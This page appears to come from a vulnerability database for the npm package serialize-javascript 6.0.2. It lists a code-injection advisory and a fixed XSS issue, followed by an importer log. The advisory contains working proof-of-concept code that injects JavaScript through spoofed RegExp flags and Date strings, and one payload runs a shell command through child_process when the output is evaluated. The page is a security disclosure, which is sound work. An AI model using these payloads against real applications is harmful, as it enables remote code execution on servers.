Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:npm/serialize-javascript@6.0.2
purl pkg:npm/serialize-javascript@6.0.2
Next non-vulnerable version 7.0.3
Latest non-vulnerable version 7.0.5
Risk 4.0
Vulnerabilities affecting this package (1)
Vulnerability Summary Fixed by
VCID-4zkq-sw4a-e7c3
Aliases:
GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() ### Impact The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660. While `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`. If an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes. ```javascript const serialize = require('serialize-javascript'); // Create an object that passes instanceof RegExp with a spoofed .flags const fakeRegex = Object.create(RegExp.prototype); Object.defineProperty(fakeRegex, 'source', { get: () => 'x' }); Object.defineProperty(fakeRegex, 'flags', { get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"' }); fakeRegex.toJSON = function() { return '@placeholder'; }; const output = serialize({ re: fakeRegex }); // Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")} let obj; eval('obj = ' + output); console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed! #h2. PoC 2: Code Injection via Date.toISOString() ``` ```javascript const serialize = require('serialize-javascript'); const fakeDate = Object.create(Date.prototype); fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; }; fakeDate.toJSON = function() { return '2024-01-01'; }; const output = serialize({ d: fakeDate }); // Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")} eval('obj = ' + output); console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed! #h2. PoC 3: Remote Code Execution ``` ```javascript const serialize = require('serialize-javascript'); const rceRegex = Object.create(RegExp.prototype); Object.defineProperty(rceRegex, 'source', { get: () => 'x' }); Object.defineProperty(rceRegex, 'flags', { get: () => '"+require("child_process").execSync("id").toString()+"' }); rceRegex.toJSON = function() { return '@rce'; }; const output = serialize({ re: rceRegex }); // Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")} // When eval'd on a Node.js server, executes the "id" system command ``` ### Patches The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
7.0.3
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (1)
Vulnerability Summary Aliases
VCID-h8nr-tcb7-93em Cross-site Scripting (XSS) in serialize-javascript A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package. CVE-2024-11831
GHSA-76p7-773f-r4q5

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-19T00:06:22.032636+00:00 GHSA Importer Fixing VCID-h8nr-tcb7-93em https://github.com/advisories/GHSA-76p7-773f-r4q5 38.4.0
2026-04-18T04:27:49.247785+00:00 GithubOSV Importer Fixing VCID-h8nr-tcb7-93em https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json 38.4.0
2026-04-17T00:27:45.616985+00:00 GitLab Importer Affected by VCID-4zkq-sw4a-e7c3 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml 38.4.0
2026-04-16T23:20:19.965357+00:00 GitLab Importer Fixing VCID-h8nr-tcb7-93em https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml 38.4.0
2026-04-12T01:52:26.767373+00:00 GitLab Importer Affected by VCID-4zkq-sw4a-e7c3 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml 38.3.0
2026-04-12T00:39:14.860723+00:00 GitLab Importer Fixing VCID-h8nr-tcb7-93em https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml 38.3.0
2026-04-07T04:56:58.394927+00:00 GHSA Importer Fixing VCID-h8nr-tcb7-93em https://github.com/advisories/GHSA-76p7-773f-r4q5 38.1.0
2026-04-03T02:00:46.093456+00:00 GitLab Importer Affected by VCID-4zkq-sw4a-e7c3 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml 38.1.0
2026-04-03T00:47:15.156003+00:00 GitLab Importer Fixing VCID-h8nr-tcb7-93em https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml 38.1.0
2026-04-02T12:40:47.742129+00:00 GitLab Importer Fixing VCID-h8nr-tcb7-93em https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml 38.0.0
2026-04-01T12:55:46.075487+00:00 GithubOSV Importer Fixing VCID-h8nr-tcb7-93em https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json 38.0.0